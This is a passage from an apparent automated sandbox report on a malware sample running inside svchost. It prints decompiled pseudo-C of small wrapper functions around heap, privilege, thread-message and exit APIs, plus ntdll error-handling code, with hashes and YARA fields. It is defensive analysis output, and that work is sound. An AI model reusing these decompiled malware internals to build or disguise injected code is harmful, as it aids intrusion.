                                          					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                                          					return 1;
                                          				} else {
                                          					return _t24;
                                          				}
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 6 41a620-41a651 call 41af50 RtlAllocateHeap
                                          C-Code - Quality: 100%
                                          			E0041A620(intOrPtr _a4, char _a8, long _a12, long _a16) {
                                          				void* _t10;
                                          				void* _t15;
                                          
                                          				E0041AF50(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                          				_t6 =  &_a8; // 0x414526
                                          				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                                          				return _t10;
                                          			}

                                          APIs
                                          • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A64D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID: &EA
                                          • API String ID: 1279760036-1330915590
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 204 408308-40835a call 41be50 call 41c9f0 call 40ace0 call 414e40 213 40835c-40836e PostThreadMessageW 204->213 214 40838e-408392 204->214 215 408370-40838a call 40a470 213->215 216 40838d 213->216 215->216 216->214
                                          C-Code - Quality: 68%
                                          			E00408308(signed int __eax, void* __edi, long _a8) {
                                          				char _v63;
                                          				char _v64;
                                          				void* _t14;
                                          				int _t15;
                                          				long _t22;
                                          				int _t27;
                                          				void* _t30;
                                          				void* _t32;
                                          				signed int _t37;
                                          
                                          				_pop(_t32);
                                          				 *__eax = __edi;
                                          				_t37 = __eax | 0x5540d146;
                                          				_t30 = _t32;
                                          				_v64 = 0;
                                          				E0041BE50( &_v63, 0, 0x3f);
                                          				E0041C9F0( &_v64, 3);
                                          				_t14 = E0040ACE0(_t37, _a8 + 0x1c,  &_v64); // executed
                                          				_t15 = E00414E40(_a8 + 0x1c, _t14, 0, 0, 0xc4e7b6d6);
                                          				_t27 = _t15;
                                          				if(_t27 != 0) {
                                          					_push(__edi);
                                          					_t22 = _a8;
                                          					_t15 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
                                          					_t39 = _t15;
                                          					if(_t15 == 0) {
                                          						_t15 =  *_t27(_t22, 0x8003, _t30 + (E0040A470(_t39, 1, 8) & 0x000000ff) - 0x40, _t15);
                                          					}
                                          				}
                                          				return _t15;
                                          			}

                                          APIs
                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 219 408310-40831f 220 408328-40835a call 41c9f0 call 40ace0 call 414e40 219->220 221 408323 call 41be50 219->221 228 40835c-40836e PostThreadMessageW 220->228 229 40838e-408392 220->229 221->220 230 408370-40838a call 40a470 228->230 231 40838d 228->231 230->231 231->229
                                          C-Code - Quality: 82%
                                          			E00408310(void* __eflags, intOrPtr _a4, long _a8) {
                                          				char _v67;
                                          				char _v68;
                                          				void* _t12;
                                          				intOrPtr* _t13;
                                          				int _t14;
                                          				long _t21;
                                          				intOrPtr* _t25;
                                          				void* _t26;
                                          				void* _t30;
                                          
                                          				_t30 = __eflags;
                                          				_v68 = 0;
                                          				E0041BE50( &_v67, 0, 0x3f);
                                          				E0041C9F0( &_v68, 3);
                                          				_t12 = E0040ACE0(_t30, _a4 + 0x1c,  &_v68); // executed
                                          				_t13 = E00414E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                          				_t25 = _t13;
                                          				if(_t25 != 0) {
                                          					_t21 = _a8;
                                          					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                          					_t32 = _t14;
                                          					if(_t14 == 0) {
                                          						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A470(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                          					}
                                          					return _t14;
                                          				}
                                          				return _t13;
                                          			}

                                          APIs
                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 258 41a652-41a677 call 41af50 260 41a67c-41a691 RtlFreeHeap 258->260
                                          C-Code - Quality: 44%
                                          			E0041A652(void* _a4, long _a8, void* _a12) {
                                          				intOrPtr _v0;
                                          				char _t10;
                                          				void* _t15;
                                          
                                          				asm("das");
                                          				_push(0x9b195d8e);
                                          				asm("rcr dword [fs:0x6c4217ac], 1");
                                          				asm("sbb edx, [ebp-0x75]");
                                          				_t7 = _v0;
                                          				_t3 = _t7 + 0xc74; // 0xc74
                                          				E0041AF50(_t15, _v0, _t3,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
                                          				_t10 = RtlFreeHeap(_a4, _a8, _a12); // executed
                                          				return _t10;
                                          			}

                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 261 41a660-41a676 262 41a67c-41a691 RtlFreeHeap 261->262 263 41a677 call 41af50 261->263 263->262
                                          C-Code - Quality: 100%
                                          			E0041A660(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                          				char _t10;
                                          				void* _t15;
                                          
                                          				_t3 = _a4 + 0xc74; // 0xc74
                                          				E0041AF50(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                          				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                          				return _t10;
                                          			}

                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 264 41a7c0-41a7f4 call 41af50 LookupPrivilegeValueW
                                          C-Code - Quality: 100%
                                          			E0041A7C0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                          				int _t10;
                                          				void* _t15;
                                          
                                          				E0041AF50(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                          				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                          				return _t10;
                                          			}

                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 267 41a692-41a6c8 call 41af50 ExitProcess
                                          C-Code - Quality: 58%
                                          			E0041A692(intOrPtr _a4, int _a8) {
                                          				signed int _t15;
                                          				void* _t17;
                                          
                                          				asm("cli");
                                          				_t17 = (_t15 ^ 0x0f3a5825) - 1;
                                          				asm("lds esi, [edx+0x55]");
                                          				_t7 = _a4;
                                          				E0041AF50(_t17, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t7 + 0xa14)), 0, 0x36);
                                          				ExitProcess(_a8);
                                          			}

                                          APIs
                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          • Opcode ID: cecb18a471669382d0dfb0dff63648774b2727865299a3c57685def264c92321
                                          • Instruction ID: 01fc8669155236cb77b8e86bae022ab97e791939009f35e61c1a55cdbd4ec333
                                          • Opcode Fuzzy Hash: cecb18a471669382d0dfb0dff63648774b2727865299a3c57685def264c92321
                                          • Instruction Fuzzy Hash: A8E086756052006BD728DB59CC55FD73BA8EF8C350F068094B91D6F343C531E941C6D1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0041A6A0(intOrPtr _a4, int _a8) {
                                          				void* _t10;
                                          
                                          				_t5 = _a4;
                                          				E0041AF50(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                          				ExitProcess(_a8);
                                          			}





                                          APIs
                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                          • Instruction ID: 02052f1feec4c32fa888e0c2ff15824475a9bddcc7bd9f2d7c69f560d23a1846
                                          • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                          • Instruction Fuzzy Hash: CBD017726002187BD620EB99CC85FD777ACDF487A4F0180A9BA1C6B242C531BA108AE5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 1395441de9038e2093353973c792fffe9a948608f1fcffd2da4048a11014078e
                                          • Instruction ID: d73c0bc47b361db7377fbea3dba4d41e0c23f8612a4cf06d937b75982474fef6
                                          • Opcode Fuzzy Hash: 1395441de9038e2093353973c792fffe9a948608f1fcffd2da4048a11014078e
                                          • Instruction Fuzzy Hash: 3BB09B719015C5C5E611D7704B0C71779047BD0741F16C057D1020641A477CC091F5B6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 03ADB53F
                                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 03ADB305
                                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 03ADB2DC
                                          • write to, xrefs: 03ADB4A6
                                          • The critical section is owned by thread %p., xrefs: 03ADB3B9
                                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 03ADB3D6
                                          • Go determine why that thread has not released the critical section., xrefs: 03ADB3C5
                                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 03ADB39B
                                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 03ADB484
                                          • *** Inpage error in %ws:%s, xrefs: 03ADB418
                                          • <unknown>, xrefs: 03ADB27E, 03ADB2D1, 03ADB350, 03ADB399, 03ADB417, 03ADB48E
                                          • *** enter .exr %p for the exception record, xrefs: 03ADB4F1
                                          • *** An Access Violation occurred in %ws:%s, xrefs: 03ADB48F
                                          • *** enter .cxr %p for the context, xrefs: 03ADB50D
                                          • *** Resource timeout (%p) in %ws:%s, xrefs: 03ADB352
                                          • The instruction at %p tried to %s , xrefs: 03ADB4B6
                                          • *** then kb to get the faulting stack, xrefs: 03ADB51C
                                          • The resource is owned shared by %d threads, xrefs: 03ADB37E
                                          • read from, xrefs: 03ADB4AD, 03ADB4B2
                                          • an invalid address, %p, xrefs: 03ADB4CF
                                          • The instruction at %p referenced memory at %p., xrefs: 03ADB432
                                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 03ADB38F
                                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 03ADB323
                                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 03ADB47D
                                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 03ADB314
                                          • a NULL pointer, xrefs: 03ADB4E0
                                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 03ADB2F3
                                          • The resource is owned exclusively by thread %p, xrefs: 03ADB374
                                          • This failed because of error %Ix., xrefs: 03ADB446
                                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 03ADB476
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                          • API String ID: 0-108210295
                                          • Opcode ID: d963b0b64c94894713a2eea87087f107c1ba5c6524ca746d29ebae299192a6c0
                                          • Instruction ID: 6431faa4333e5f2f379b192257d8981c764b02bf1cedb4a77de79d8a768f41d2
                                          • Opcode Fuzzy Hash: d963b0b64c94894713a2eea87087f107c1ba5c6524ca746d29ebae299192a6c0
                                          • Instruction Fuzzy Hash: A081D179A40210FFCB26DF098C45DBF3B3AAF57A51B06004BF4162F613D2668561D6B2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 44%
                                          			E03AE1C06() {
                                          				signed int _t27;
                                          				char* _t104;
                                          				char* _t105;
                                          				intOrPtr _t113;
                                          				intOrPtr _t115;
                                          				intOrPtr _t117;
                                          				intOrPtr _t119;
                                          				intOrPtr _t120;
                                          
                                          				_t105 = 0x3a048a4;
                                          				_t104 = "HEAP: ";
                                          				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          					_push(_t104);
                                          					E03A2B150();
                                          				} else {
                                          					E03A2B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          				}
                                          				_push( *0x3b1589c);
                                          				E03A2B150("Heap error detected at %p (heap handle %p)\n",  *0x3b158a0);
                                          				_t27 =  *0x3b15898; // 0x0
                                          				if(_t27 <= 0xf) {
                                          					switch( *((intOrPtr*)(_t27 * 4 +  &M03AE1E96))) {
                                          						case 0:
                                          							_t105 = "heap_failure_internal";
                                          							goto L21;
                                          						case 1:
                                          							goto L21;
                                          						case 2:
                                          							goto L21;
                                          						case 3:
                                          							goto L21;
                                          						case 4:
                                          							goto L21;
                                          						case 5:
                                          							goto L21;
                                          						case 6:
                                          							goto L21;
                                          						case 7:
                                          							goto L21;
                                          						case 8:
                                          							goto L21;
                                          						case 9:
                                          							goto L21;
                                          						case 0xa:
                                          							goto L21;
                                          						case 0xb:
                                          							goto L21;
                                          						case 0xc:
                                          							goto L21;
                                          						case 0xd:
                                          							goto L21;
                                          						case 0xe:
                                          							goto L21;
                                          						case 0xf:
                                          							goto L21;
                                          					}
                                          				}
                                          				L21:
                                          				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          					_push(_t104);
                                          					E03A2B150();
                                          				} else {
                                          					E03A2B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          				}
                                          				_push(_t105);
                                          				E03A2B150("Error code: %d - %s\n",  *0x3b15898);
                                          				_t113 =  *0x3b158a4; // 0x0
                                          				if(_t113 != 0) {
                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          						_push(_t104);
                                          						E03A2B150();
                                          					} else {
                                          						E03A2B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          					}
                                          					E03A2B150("Parameter1: %p\n",  *0x3b158a4);
                                          				}
                                          				_t115 =  *0x3b158a8; // 0x0
                                          				if(_t115 != 0) {
                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          						_push(_t104);
                                          						E03A2B150();
                                          					} else {
                                          						E03A2B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          					}
                                          					E03A2B150("Parameter2: %p\n",  *0x3b158a8);
                                          				}
                                          				_t117 =  *0x3b158ac; // 0x0
                                          				if(_t117 != 0) {
                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          						_push(_t104);
                                          						E03A2B150();
                                          					} else {
                                          						E03A2B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          					}
                                          					E03A2B150("Parameter3: %p\n",  *0x3b158ac);
                                          				}
                                          				_t119 =  *0x3b158b0; // 0x0
                                          				if(_t119 != 0) {
                                          					L41:
                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          						_push(_t104);
                                          						E03A2B150();
                                          					} else {
                                          						E03A2B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          					}
                                          					_push( *0x3b158b4);
                                          					E03A2B150("Last known valid blocks: before - %p, after - %p\n",  *0x3b158b0);
                                          				} else {
                                          					_t120 =  *0x3b158b4; // 0x0
                                          					if(_t120 != 0) {
                                          						goto L41;
                                          					}
                                          				}
                                          				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          					_push(_t104);
                                          					E03A2B150();
                                          				} else {
                                          					E03A2B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          				}
                                          				return E03A2B150("Stack trace available at %p\n", 0x3b158c0);
                                          			}












                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                          • API String ID: 0-2897834094
                                          • Opcode ID: ad8643b8184a82dd7cc84a98f213708759863ecdb3013f8c99b5b24c1c44b986
                                          • Instruction ID: 80f1a0b7ff23232008c96c36c8ea9da5cd768ac36f9083981a2012f03470454f
                                          • Opcode Fuzzy Hash: ad8643b8184a82dd7cc84a98f213708759863ecdb3013f8c99b5b24c1c44b986
                                          • Instruction Fuzzy Hash: A961B836521274DFC211EB8CD589E34B7B4FB48A34B4D806FF80AAF751D6749C608B29
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 96%
                                          			E03A33D34(signed int* __ecx) {
                                          				signed int* _v8;
                                          				char _v12;
                                          				signed int* _v16;
                                          				signed int* _v20;
                                          				char _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				char _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				signed int* _v48;
                                          				signed int* _v52;
                                          				signed int _v56;
                                          				signed int _v60;
                                          				char _v68;
                                          				signed int _t140;
                                          				signed int _t161;
                                          				signed int* _t236;
                                          				signed int* _t242;
                                          				signed int* _t243;
                                          				signed int* _t244;
                                          				signed int* _t245;
                                          				signed int _t255;
                                          				void* _t257;
                                          				signed int _t260;
                                          				void* _t262;
                                          				signed int _t264;
                                          				void* _t267;
                                          				signed int _t275;
                                          				signed int* _t276;
                                          				short* _t277;
                                          				signed int* _t278;
                                          				signed int* _t279;
                                          				signed int* _t280;
                                          				short* _t281;
                                          				signed int* _t282;
                                          				short* _t283;
                                          				signed int* _t284;
                                          				void* _t285;
                                          
                                          				_v60 = _v60 | 0xffffffff;
                                          				_t280 = 0;
                                          				_t242 = __ecx;
                                          				_v52 = __ecx;
                                          				_v8 = 0;
                                          				_v20 = 0;
                                          				_v40 = 0;
                                          				_v28 = 0;
                                          				_v32 = 0;
                                          				_v44 = 0;
                                          				_v56 = 0;
                                          				_t275 = 0;
                                          				_v16 = 0;
                                          				if(__ecx == 0) {
                                          					_t280 = 0xc000000d;
                                          					_t140 = 0;
                                          					L50:
                                          					 *_t242 =  *_t242 | 0x00000800;
                                          					_t242[0x13] = _t140;
                                          					_t242[0x16] = _v40;
                                          					_t242[0x18] = _v28;
                                          					_t242[0x14] = _v32;
                                          					_t242[0x17] = _t275;
                                          					_t242[0x15] = _v44;
                                          					_t242[0x11] = _v56;
                                          					_t242[0x12] = _v60;
                                          					return _t280;
                                          				}
                                          				if(E03A31B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                          					_v56 = 1;
                                          					if(_v8 != 0) {
                                          						L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                          					}
                                          					_v8 = _t280;
                                          				}
                                          				if(E03A31B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                          					_v60 =  *_v8;
                                          					L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                          					_v8 = _t280;
                                          				}
                                          				if(E03A31B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                          					L16:
                                          					if(E03A31B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                          						L28:
                                          						if(E03A31B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                          							L46:
                                          							_t275 = _v16;
                                          							L47:
                                          							_t161 = 0;
                                          							L48:
                                          							if(_v8 != 0) {
                                          								L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                          							}
                                          							_t140 = _v20;
                                          							if(_t140 != 0) {
                                          								if(_t275 != 0) {
                                          									L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                          									_t275 = 0;
                                          									_v28 = 0;
                                          									_t140 = _v20;
                                          								}
                                          							}
                                          							goto L50;
                                          						}
                                          						_t167 = _v12;
                                          						_t255 = _v12 + 4;
                                          						_v44 = _t255;
                                          						if(_t255 == 0) {
                                          							_t276 = _t280;
                                          							_v32 = _t280;
                                          						} else {
                                          							_t276 = L03A44620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                          							_t167 = _v12;
                                          							_v32 = _t276;
                                          						}
                                          						if(_t276 == 0) {
                                          							_v44 = _t280;
                                          							_t280 = 0xc0000017;
                                          							goto L46;
                                          						} else {
                                          							E03A6F3E0(_t276, _v8, _t167);
                                          							_v48 = _t276;
                                          							_t277 = E03A71370(_t276, 0x3a04e90);
                                          							_pop(_t257);
                                          							if(_t277 == 0) {
                                          								L38:
                                          								_t170 = _v48;
                                          								if( *_v48 != 0) {
                                          									E03A6BB40(0,  &_v68, _t170);
                                          									if(L03A343C0( &_v68,  &_v24) != 0) {
                                          										_t280 =  &(_t280[0]);
                                          									}
                                          								}
                                          								if(_t280 == 0) {
                                          									_t280 = 0;
                                          									L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                          									_v44 = 0;
                                          									_v32 = 0;
                                          								} else {
                                          									_t280 = 0;
                                          								}
                                          								_t174 = _v8;
                                          								if(_v8 != 0) {
                                          									L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                          								}
                                          								_v8 = _t280;
                                          								goto L46;
                                          							}
                                          							_t243 = _v48;
                                          							do {
                                          								 *_t277 = 0;
                                          								_t278 = _t277 + 2;
                                          								E03A6BB40(_t257,  &_v68, _t243);
                                          								if(L03A343C0( &_v68,  &_v24) != 0) {
                                          									_t280 =  &(_t280[0]);
                                          								}
                                          								_t243 = _t278;
                                          								_t277 = E03A71370(_t278, 0x3a04e90);
                                          								_pop(_t257);
                                          							} while (_t277 != 0);
                                          							_v48 = _t243;
                                          							_t242 = _v52;
                                          							goto L38;
                                          						}
                                          					}
                                          					_t191 = _v12;
                                          					_t260 = _v12 + 4;
                                          					_v28 = _t260;
                                          					if(_t260 == 0) {
                                          						_t275 = _t280;
                                          						_v16 = _t280;
                                          					} else {
                                          						_t275 = L03A44620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                          						_t191 = _v12;
                                          						_v16 = _t275;
                                          					}
                                          					if(_t275 == 0) {
                                          						_v28 = _t280;
                                          						_t280 = 0xc0000017;
                                          						goto L47;
                                          					} else {
                                          						E03A6F3E0(_t275, _v8, _t191);
                                          						_t285 = _t285 + 0xc;
                                          						_v48 = _t275;
                                          						_t279 = _t280;
                                          						_t281 = E03A71370(_v16, 0x3a04e90);
                                          						_pop(_t262);
                                          						if(_t281 != 0) {
                                          							_t244 = _v48;
                                          							do {
                                          								 *_t281 = 0;
                                          								_t282 = _t281 + 2;
                                          								E03A6BB40(_t262,  &_v68, _t244);
                                          								if(L03A343C0( &_v68,  &_v24) != 0) {
                                          									_t279 =  &(_t279[0]);
                                          								}
